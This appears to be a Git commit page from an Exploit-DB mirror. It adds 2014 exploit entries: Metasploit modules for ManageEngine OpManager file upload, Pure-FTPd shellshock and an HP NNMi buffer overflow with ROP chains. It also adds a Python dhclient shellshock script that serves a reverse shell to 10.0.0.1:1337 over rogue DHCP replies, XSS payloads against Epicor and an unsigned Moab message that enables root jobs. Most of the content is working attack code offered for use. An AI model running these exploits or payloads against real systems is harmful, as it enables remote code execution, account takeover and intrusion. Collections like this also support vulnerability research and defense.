bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 10_04_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-04 04:45:25 +00:00
parent 8e5a9aa87e
commit 4bbfac55c5
27 changed files with 2095 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

26
files.csv
View file

@ -31367,3 +31367,29 @@ id,file,description,date,author,platform,type,port
34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 'libtidy.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-12,anT!-Tr0J4n,windows,remote,0
34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component 'controller' Parameter Local File Include Vulnerability",2010-10-13,jos_ali_joe,php,webapps,0
34838,platforms/windows/remote/34838.c,"Torrent DVD Creator 'quserex.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-13,anT!-Tr0J4n,windows,remote,0
34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
34842,platforms/php/webapps/34842.txt,"TWiki <= 5.0 bin/view rev Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0
34843,platforms/php/webapps/34843.txt,"TWiki <= 5.0 bin/login Multiple Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0
34844,platforms/windows/remote/34844.c,"STDU Explorer 1.0.201 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-15,anT!-Tr0J4n,windows,remote,0
34845,platforms/php/webapps/34845.txt,"PHP Photo Vote 1.3F 'page' Parameter Cross Site Scripting Vulnerability",2009-08-07,Moudi,php,webapps,0
34846,platforms/windows/remote/34846.txt,"httpdx 1.4.5 dot Character Remote File Disclosure Vulnerability",2009-10-09,Dr_IDE,windows,remote,0
34847,platforms/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R 'subitems.php' Cross Site Scripting Vulnerability",2009-08-07,Moudi,php,webapps,0
34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0
34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 'req' Parameter Local and Remote File Include Vulnerabilities",2010-01-19,indoushka,php,webapps,0
34850,platforms/php/webapps/34850.txt,"eXV2 CMS Multiple Cross Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0
34852,platforms/php/webapps/34852.txt,"HTTP File Server 2.3a, 2.3b, 2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",php,webapps,80
34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 'trigger.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0
34854,platforms/php/webapps/34854.txt,"All In One Wordpress Firewall 3.8.3 - Persistent XSS Vulnerability",2014-10-02,Vulnerability-Lab,php,webapps,80
34855,platforms/windows/dos/34855.pl,"ALPHA Player 2.4 '.bmp' File Buffer Overflow Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
34856,platforms/windows/remote/34856.py,"Kolibri Webserver 2.0 Buffer Overflow with EMET 5.0 and EMET 4.1 Partial Bypass",2014-10-02,tekwizz123,windows,remote,80
34857,platforms/windows/dos/34857.txt,"TeamSpeak Client 3.0.14 - Buffer Overflow Vulnerability",2014-10-02,"SpyEye and Christian Galeon",windows,dos,0
34858,platforms/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - CSRF Vulnerability",2014-10-02,"Krusty Hack",php,webapps,80
34860,platforms/linux/remote/34860.py,"GNU bash 4.3.11 Environment Variable dhclient Exploit",2014-10-02,@0x00string,linux,remote,0
34861,platforms/php/webapps/34861.txt,"PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution",2014-10-02,Portcullis,php,webapps,80
34862,platforms/linux/remote/34862.rb,"Pure-FTPd External Authentication Bash Environment Variable Code Injection",2014-10-02,metasploit,linux,remote,21
34863,platforms/php/webapps/34863.txt,"TestLink 1.9.11 - Multiple SQL Injection Vulnerabilities",2014-10-02,Portcullis,php,webapps,80
34864,platforms/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",asp,webapps,443
34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authorization Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0
34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I PMD Buffer Overflow",2014-10-02,metasploit,linux,remote,7426
34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload",2014-10-02,"Pedro Ribeiro",java,remote,80

Can't render this file because it is too large.

72
platforms/asp/webapps/34864.txt Executable file
View file

@ -0,0 +1,72 @@
"Epicor Enterprise vulnerabilities"
- Affected vendor: Epicor Software Corporation
- Affected system: Epicor Enterprise - Version 7.4
- Vendor disclosure date: May 13th, 2014
- Public disclosure date: September 30th, 2014
- Status: Fixed
- Associated CVEs:
1) CVE-2014-4311
Password values not masked appropriately:
Even though the application appears to be masking the affected password values
in the database connection and email settings page, it is possible to access
their content by observing the HTML code.
Affected password values:
- “Database Connection”
- “E-mail Connection”
Associated CAPEC:
CAPEC-167: Lifting Sensitive Data from the Client -
https://capec.mitre.org/data/definitions/167.html
Associated CWE:
CWE-200: Information Exposure - http://cwe.mitre.org/data/definitions/200.html
2) CVE-2014-4312
Persistent and reflective cross-site scripting (XSS) attacks possible:
The identified website is vulnerable to persistent and reflective cross-site
scripting. Script injection is a weakness within an application, and is due to
insufficient validation of the input data (i.e. input data being sent from the
user/presentation layer) and output encoding allowing dynamic execution of
scripts on the application front end resulting in anomalous/abnormal behaviour
of the application.
Example of affected functionalities for persistent XSS:
- 1. While viewing Order details, and injecting a malicious payload on the
"Notes" section.
- 2. While modifying an “Order to consume” and injecting a malicious payload
on the "Description" section.
- 3. While observing the “Favorites” section and and injecting a malicious
payload on the “Favorites name” section.
Example of an injected payload: <script>alert("XSS")</script>
Example of affected URLs for reflective XSS:
- 1.
https://XXXXX/Procurement/EKPHTML/search_item_bt.asp?RecordsRequested=Yes&FiltPartNo=&FiltSupplier=-1&FiltKeyword=<script>alert("XSS")</script>
- 2.
https://XXXXX/Procurement/EKPHTML/EnterpriseManager/Budget/ImportBudget_fr.asp?Act=dtt"><script>alert("XSS")</script>
- 3. https://XXXXX
/Procurement/EKPHTML/EnterpriseManager/UserSearchDlg.asp?hdnPageName=UserSearch&hdnOpenerFormName=PrefApp&hdnApproverFieldName=temp1&hdnApproverIDFieldName=temp2&hdnUserID=200&hdnOpener=Test"><script>alert("XSS")</script>
- 4.
https://XXXXX/Procurement/EKPHTML/EnterpriseManager/UserSearchDlg.asp?hdnOpenerFormName=PrefApp&hdnApproverFieldName="><script>alert("XSS")</script>
- 5.
https://XXXXX/Procurement/EKPHTML/EnterpriseManager/Codes.asp?INTEGRATED=XSS">--><script>alert("XSS")</script>
Associated CAPEC:
CAPEC-32: Embedding Scripts in HTTP Query Strings -
https://capec.mitre.org/data/definitions/32.html
Associated CWE:
CWE-79: Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting') - http://cwe.mitre.org/data/definitions/79.html
- Available fix:
Epicor Enterprise Hotfix: FS74SP6_HotfixTL054181
- Credit:
These vulnerabilities were discovered by Fara Rustein.
If you have any questions, comments, concerns, updates or suggestions please
contact Fara Rustein (TW: @fararustein).

154
platforms/java/remote/34867.rb Executable file
View file

@ -0,0 +1,154 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.
The vulnerability exists in the FileCollector servlet which accepts unauthenticated
file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on
version 11.0 of SocialIT for Windows and Linux.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-6034' ],
[ 'OSVDB', '112276' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]
],
'Privileged' => true,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 27 2014'))
register_options(
[
Opt::RPORT(80),
OptInt.new('SLEEP',
[true, 'Seconds to sleep while we wait for WAR deployment', 15]),
], self.class)
end
def check
res = send_request_cgi({
'uri' => normalize_uri("/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"),
'method' => 'GET'
})
# A GET request on this servlet returns "405 Method not allowed"
if res and res.code == 405
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def upload_war_and_exec(try_again, app_base)
tomcat_path = '../../../tomcat/'
servlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'
if try_again
# We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration
# does not allow us to deploy WARs. Fix that by uploading a new context.xml file.
# The file we are uploading has the same content apart from privileged="false" and lots of XML comments.
# After replacing the context.xml file let's upload the WAR again.
print_status("#{peer} - Replacing Tomcat context file")
send_request_cgi({
'uri' => normalize_uri(servlet_path),
'method' => 'POST',
'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged="true"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},
'ctype' => 'application/xml',
'vars_get' => {
'regionID' => tomcat_path + "conf",
'FILENAME' => "context.xml"
}
})
else
# We need to create the upload directories before our first attempt to upload the WAR.
print_status("#{peer} - Creating upload directories")
bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
send_request_cgi({
'uri' => normalize_uri(servlet_path),
'method' => 'POST',
'data' => rand_text_alphanumeric(4 + rand(32 - 4)),
'ctype' => 'application/xml',
'vars_get' => {
'regionID' => "",
'FILENAME' => bogus_file
}
})
register_files_for_cleanup("state/archivedata/zip/" + bogus_file)
end
war_payload = payload.encoded_war({ :app_name => app_base }).to_s
print_status("#{peer} - Uploading WAR file...")
res = send_request_cgi({
'uri' => normalize_uri(servlet_path),
'method' => 'POST',
'data' => war_payload,
'ctype' => 'application/octet-stream',
'vars_get' => {
'regionID' => tomcat_path + "webapps",
'FILENAME' => app_base + ".war"
}
})
# The server either returns a 500 error or a 200 OK when the upload is successful.
if res and (res.code == 500 or res.code == 200)
print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
" seconds for deployment")
sleep(datastore['SLEEP'])
else
fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed")
end
print_status("#{peer} - Executing payload, wait for session...")
send_request_cgi({
'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
end
def exploit
app_base = rand_text_alphanumeric(4 + rand(32 - 4))
upload_war_and_exec(false, app_base)
register_files_for_cleanup("tomcat/webapps/" + "#{app_base}.war")
sleep_counter = 0
while not session_created?
if sleep_counter == datastore['SLEEP']
print_error("#{peer} - Failed to get a shell, let's try one more time")
upload_war_and_exec(true, app_base)
return
end
sleep(1)
sleep_counter += 1
end
end
end

74
platforms/linux/remote/34860.py Executable file
View file

@ -0,0 +1,74 @@
#!/usr/bin/python
# Exploit Title: dhclient shellshocker
# Google Dork: n/a
# Date: 10/1/14
# Exploit Author: @0x00string
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
# Version: 4.3.11
# Tested on: Ubuntu 14.04.1
# CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187
# ______ ______ ______ _
# / __ | / __ |/ __ | _ (_)
#| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___
#| |// | ( \ / ) |// | | |// | |/___) _) / ___) | _ \ / _ |/___)
#| /__| |) X (| /__| | /__| |___ | |__| | | | | | ( ( | |___ |
# \_____/(_/ \_)\_____/ \_____/(___/ \___)_| |_|_| |_|\_|| (___/
# (_____|
# _ _ _ _
# | | | | (_) _
# _ | | | _ ____| |_ ____ ____ | |_
# / || | || \ / ___) | |/ _ ) _ \| _)
#( (_| | | | ( (___| | ( (/ /| | | | |__
# \____|_| |_|\____)_|_|\____)_| |_|\___)
#
# _ _ _ _ _
# | | | | | | | | |
# ___| | _ ____| | | ___| | _ ___ ____| | _ ____ ____
# /___) || \ / _ ) | |/___) || \ / _ \ / ___) | / ) _ )/ ___)
#|___ | | | ( (/ /| | |___ | | | | |_| ( (___| |< ( (/ /| |
#(___/|_| |_|\____)_|_(___/|_| |_|\___/ \____)_| \_)____)_|
# this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts
# once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out
# The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability.
# can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example.
import socket, struct
def HexToByte( hexStr ):
b = []
h = ''.join( h.split(" ") )
for i in range(0, len(h), 2):
b.append( chr( int (h[i:i+2], 16 ) ) )
return ''.join( b )
rport = 68
lport = 67
bsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bsock.bind(("<broadcast>", lport))
while True:
OP = "72" # 56, Message - RFC 1533,2132. 61, Client-identifier - RFC 1533,2132,4361 or 114, URL - RFC 3679 are currently known to work, here we use 114
URL = "() { :;}; bash -i >& /dev/tcp/10.0.0.1/1337 0>&1".encode("hex")
URLLEN = chr(len(URL) / 2).encode("hex")
END = "03040a000001ff"
broadcast_get, (bcrhost, rport) = bsock.recvfrom(2048)
hexip = broadcast_get[245:249]
rhost = str(ord(hexip[0])) + "." + str(ord(hexip[1])) + "." + str(ord(hexip[2])) + "." + str(ord(hexip[3]))
XID = broadcast_get[4:8].encode("hex")
chaddr = broadcast_get[29:34].encode("hex")
print "[+]\tgot broadcast with XID " + XID + " requesting IP " + rhost + "\n"
OFFER = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010236040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END
OFFER_BYTES = HexToByte(OFFER)
ACK = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010536040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END
ACK_BYTES = HexToByte(ACK)
print "[+]\tsending evil offer\n"
sock.sendto(OFFER_BYTES, (rhost, rport))
broadcast_get2 = bsock.recvfrom(2048)
print "[+]\tassuming request was received, sending ACK\n"
sock.sendto(ACK_BYTES, (rhost, rport))

116
platforms/linux/remote/34862.rb Executable file
View file

@ -0,0 +1,116 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
'Description' => %q(
This module exploits the code injection flaw known as shellshock which
leverages specially crafted environment variables in Bash. This exploit
specifically targets Pure-FTPd when configured to use an external
program for authentication.
),
'Author' =>
[
'Stephane Chazelas', # Vulnerability discovery
'Frank Denis', # Discovery of Pure-FTPd attack vector
'Spencer McIntyre' # Metasploit module
],
'References' =>
[
['CVE', '2014-6271'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']
],
'Payload' =>
{
'DisableNops' => true,
'Space' => 2048
},
'Targets' =>
[
[ 'Linux x86',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => :printf
}
],
[ 'Linux x86_64',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => :printf
}
]
],
'DefaultOptions' =>
{
'PrependFork' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2014'))
register_options(
[
Opt::RPORT(21),
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
], self.class)
deregister_options('FTPUSER', 'FTPPASS')
end
def check
# this check method tries to use the vulnerability to bypass the login
username = rand_text_alphanumeric(rand(20) + 1)
random_id = (rand(100) + 1)
command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
if send_command(username, command) =~ /^2\d\d ok./i
return CheckCode::Safe if banner !~ /pure-ftpd/i
disconnect
command = "echo auth_ok:0; echo end"
if send_command(username, command) =~ /^5\d\d login authentication failed/i
return CheckCode::Vulnerable
end
end
disconnect
CheckCode::Safe
end
def execute_command(cmd, _opts)
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
username = rand_text_alphanumeric(rand(20) + 1)
send_command(username, cmd)
end
def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
end
execute_cmdstager(linemax: 500)
handler
end
def send_command(username, cmd)
cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
connect
send_user(username)
password_result = send_pass(cmd)
disconnect
password_result
end
end

229
platforms/linux/remote/34866.rb Executable file
View file

@ -0,0 +1,229 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Network Node Manager I PMD Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The
vulnerability exists in the pmd service, due to the insecure usage of functions like
strcpy and strcat while handling stack_option packets with user controlled data. In
order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from
the stack and finally build the rop chain to avoid NX.
},
'Author' =>
[
'd(-_-)b', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-2624'],
['ZDI', '14-305']
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 3000,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic python perl openssl bash-tcp gawk'
}
},
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Targets' =>
[
['Automatic', {}],
['HP NNMi 9.10 / CentOS 5',
{
# ptr to .rodata with format specifier
#.rodata:0003BE86 aS_1 db '%s',0
'ov_offset' => 0x3BE86,
:rop => :rop_hp_nnmi_9_10
}
],
['HP NNMi 9.20 / CentOS 6',
{
# ptr to .rodata with format specifier
#.rodata:0003C2D6 aS_1 db '%s',0
'ov_offset' => 0x3c2d8,
:rop => :rop_hp_nnmi_9_20
}
]
],
'Privileged' => false, # true for HP NNMi 9.10, false for HP NNMi 9.20
'DisclosureDate' => 'Sep 09 2014',
'DefaultTarget' => 0
))
register_options([ Opt::RPORT(7426) ], self.class)
end
def check
header = [
0x2a5, # pmdmgr_init pkt
0x3cc, # signature
0xa0c, # signature
0xca8 # signature
].pack("V")
data = "\x00" * (0xfa4 - header.length)
pkt = header + data
connect_udp
udp_sock.put(pkt)
res = udp_sock.timed_read(8, 1)
if res.blank?
# To mitigate MacOSX udp sockets behavior
# see https://dev.metasploit.com/redmine/issues/7480
udp_sock.put(pkt)
res = udp_sock.timed_read(8)
end
disconnect_udp
if res.blank?
return Exploit::CheckCode::Unknown
elsif res.length == 8 && res.unpack("V").first == 0x2a5
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unknown
end
end
def exploit
connect_udp
# info leak with a "proto_tbl" packet
print_status("Sending a 'proto_tbl' request...")
udp_sock.put(proto_tbl_pkt)
res = udp_sock.timed_read(13964, 1)
if res.blank?
# To mitigate MacOSX udp sockets behavior
# see https://dev.metasploit.com/redmine/issues/7480
udp_sock.put(proto_tbl_pkt)
res = udp_sock.timed_read(13964)
end
if res.blank?
fail_with(Failure::Unknown, "Unable to get a 'proto_tbl' response...")
end
if target.name == 'Automatic'
print_status("Fingerprinting target...")
my_target = auto_target(res)
fail_with(Failure::NoTarget, "Unable to autodetect target...") if my_target.nil?
else
my_target = target
fail_with(Failure::Unknown, "Unable to leak libov base address...") unless find_ov_base(my_target, res)
end
print_good("Exploiting #{my_target.name} with libov base address at 0x#{@ov_base.to_s(16)}...")
# exploit with a "stack_option_pkt" packet
udp_sock.put(stack_option_pkt(my_target, @ov_base))
disconnect_udp
end
def rop_hp_nnmi_9_10(ov_base)
rop = rand_text_alpha(775)
rop << [0x808d7c1].pack("V") # pop ebx ; pop ebp ; ret
rop << [ov_base + 0x481A8].pack("V") # ebx: libov .got
rop << [0x8096540].pack("V") # ptr to .data where user controlled string will be stored:
# "PMD Stack option specified, but stack not available (user_controlled)"
rop << [0x808d7c2].pack("V") # pop ebp # ret
rop << [0x08096540 + 4732].pack("V") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)
rop << [ov_base + 0x1D692].pack("V") # ptr to 'call _system' sequence:
#.text:0001D692 lea eax, [ebp+dest]
#.text:0001D698 push eax ; command
#.text:0001D699 call _system
rop
end
def rop_hp_nnmi_9_20(ov_base)
rop = rand_text_alpha(775)
rop << [0x808dd70].pack("V") # pop eax ; pop ebx ; pop ebp ; ret
rop << [0xf7f61cd0 + ov_base + 0x1dae6].pack("V") # eax: ptr to 'call _system' sequence
#.text:0001DAE6 lea eax, [ebp+dest] (dest = -0x1028)
#.text:0001DAEC push eax ; command
#.text:0001DAED call _system
rop << [0x08097160].pack("V") # ebx: ptr to .data where user controlled string will be stored:
# "PMD Stack option specified, but stack not available (user_controlled)"
rop << rand_text_alpha(4) # ebp: padding
rop << [0x804fb86].pack("V") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)
rop << [0x8049ac4].pack("V") # xchg eax, edi ; ret
rop << [0x808dd70].pack("V") # pop eax ; pop ebx ; pop ebp ; ret
rop << [0xf7f61cd0 + ov_base + 0x47f1c].pack("V") # eax: libov .got base
rop << rand_text_alpha(4) # ebx: padding
rop << [0x8097160 + 4764].pack("V") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)
rop << [0x804fb86].pack("V") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)
rop << [0x805a58d].pack("V") # xchg ebx eax ; and eax 0xc4830001 ; and cl cl ; ret (ebx: libov .got)
rop << [0x8049ac4].pack("V") # xchg eax, edi ; ret ; (eax: call to system sequence from libov)
rop << [0x80528BC].pack("V") # jmp eax
rop
end
def stack_option_pkt(t, ov_base)
hdr = [0x2a9].pack("V") # stack_option packet
data = "-SA" # stack name (invalid one 'A')
data << ";" # separator
data << self.send(t[:rop], ov_base) # malformed stack options
data << payload.encoded
data << ";\n"
data << "\x00" * (0xfa4 - data.length - hdr.length)
hdr + data
end
def proto_tbl_pkt
hdr = [0x2aa].pack("V") # proto_tbl packet
data = "\x00" * (0xfa4 - hdr.length)
hdr + data
end
def base(address, offset)
address - offset
end
def find_ov_base(t, data)
print_status("Searching #{t.name} pointers...")
i = 0
data.unpack("V*").each do |int|
if base(int, t['ov_offset']) % 0x1000 == 0
print_status("Pointer 0x#{int.to_s(16)} found at offset #{i * 4}")
@ov_base = base(int, t['ov_offset'])
return true
end
i = i + 1
end
false
end
def auto_target(data)
targets.each do |t|
next if t.name == 'Automatic'
if find_ov_base(t, data)
return t
end
end
nil
end
end

110
platforms/multiple/webapps/34865.txt Executable file
View file

@ -0,0 +1,110 @@
##[Moab Authentication Bypass : CVE-2014-5300]##
Software: Moab
Affected Versions: All versions prior to Moab 7.2.9 and Moab 8
CVE Reference: CVE-2014-5300
Author: John Fitzpatrick, MWR Labs (http://labs.mwrinfosecurity.com/)
Severity: High Risk
Vendor: Adaptive Computing
Vendor Response: Resolved in Moab 7.2.9 and Moab 8
##[Description]
It is possible to bypass authentication within Moab in order to impersonate and run commands/operations as arbitrary users. The issue is believed to affect all versions of Moab prior to versions 7.2.9 and Moab 8.
##[Impact]
Successful exploitation could lead to remote code execution.
##[Cause]
The Moab server does not appropriately authenticate requests.
##[Solution]
Upgrade to Moab 7.2.9, Moab 8, or a later version of the software. Beta versions of Moab 8 are affected by this issue. This issue also affects versions of Moab which are using Munge for authentication.
This issue is believed to affect all instances of Moab prior to version 7.2.9 and 8. MWR are not aware of any alternate workaround for this issue.
##[Technical Details]
Moab is a workload manager used in High Performance Computing (HPC) environments. In a typical environment a user submits their jobs to the Moab server for it to handle the workload. This communication makes use of an XML based protocol, and example job submission is shown below:
<Envelope component="ClusterScheduler" count="1" name="moab" type="nonblocking" version="8.0.beta.2">
<Signature>
<DigestValue>7v49VzAlbyNQ4O3VChCus+v2LeE=</DigestValue>
<SignatureValue>QG13cmxhYnMgRWFzdGVyIEVnZyE=</SignatureValue>
</Signature>
<Body actor="test" timestamp="1408488412">
<Request action="submit" actor="test" cmdline="\STARTmsub">
<Object>job</Object>
<job>
<Owner>test</Owner>
<UserId>test</UserId>
<GroupId>test</GroupId>
<InitialWorkingDirectory>/home/test</InitialWorkingDirectory>
<UMask>2</UMask>
<Executable>/usr/bin/id</Executable>
<SubmitLanguage>PBS</SubmitLanguage>
<SubmitString>\START/usr/bin/id\0a\0a</SubmitString>
</job>
</Request>
</Body>
</Envelope>
Contained within this message is a <Signature> element, which contains both a <DigestValue> and <SignatureValue> elements. The <DigestValue> is simply a SHA1 sum of the <Body> element. The <SignatureValue>, however, is computed based upon a key (.moab.key) which is read by a setuid root binary (mauth) which performs some additional verification of the user before providing a signature for the message. This use of signatures is intended to prevent users from being able to craft arbitrary messages as the signature value is validated by the Moab server. Messages containing an incorrect signature for the message will be rejected.
However, whilst an incorrect SignatureValue results in a rejected message, it was found that if no signature is supplied then the signature checks are skipped and the remainder of the message processed. As a result it is possible to craft arbitrary messages and these messages will be accepted and honoured by the server as long as the message does not include a <Signature> element.
The following message contains no signature element and therefore will be accepted by the server:
<Envelope component="ClusterScheduler" count="1" name="moab" type="nonblocking" version="8.0.beta.2">
<Body actor="test" timestamp="1408488412">
<Request action="submit" actor="test" cmdline="\STARTmsub">
<Object>job</Object>
<job>
<Owner>test</Owner>
<UserId>test</UserId>
<GroupId>test</GroupId>
<InitialWorkingDirectory>/home/test</InitialWorkingDirectory>
<UMask>2</UMask>
<Executable>/usr/bin/id</Executable>
<SubmitLanguage>PBS</SubmitLanguage>
<SubmitString>\START/usr/bin/id\0a\0a</SubmitString>
</job>
</Request>
</Body>
</Envelope>
With no signing taking place an adversary can specify arbitrary users for these operations to be performed under, and thus impersonate other users including executing jobs as other users.
##[Proof of Concept]
In addition to job submission Moab also provides the ability to dynamically reconfigure the Moab server remotely. Whilst a default Moab installation will not permit the submission of root jobs it is possible to exploit this vulnerability in order to dynamically reconfigure Moab to allow root job submissions. The following request achieves this and due to its simple nature makes a useful proof of concept (the timestamp value may require altering):
00000238
<Envelope component="ClusterScheduler" count="1" name="moab" version="8.0.beta.2"><Body actor="root" timestamp="1404856164"><Request action="modify" actor="root" args="ALLOWROOTJOBS TRUE"><Object>sched</Object></Request></Body></Envelope>
Sending the entire message above (including the size value) will enable root jobs on a vulnerable server.
##[Detailed Timeline]
2014-07-08 : Vulnerability identified and detailed information passed to Adaptive
2014-07-09 : Adaptive inform MWR that code changes are being made to address the issue
2014-07-11 : Adaptive inform MWR that regression testing has identified an additional issue
2014-07-14 : Moab 8 released
2014-08-20 : Limited status update provided by Adaptive suggesting a 7.2 fix will emerge
2014-09-08 : Release of advisory to HPC community
2014-09-16 : Moab 7.2.9 released
2014-09-25 : Public release of advisory
http://labs.mwrinfosecurity.com

70
platforms/php/webapps/34840.txt Executable file
View file

@ -0,0 +1,70 @@
source: http://www.securityfocus.com/bid/44066/info
Ronny CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
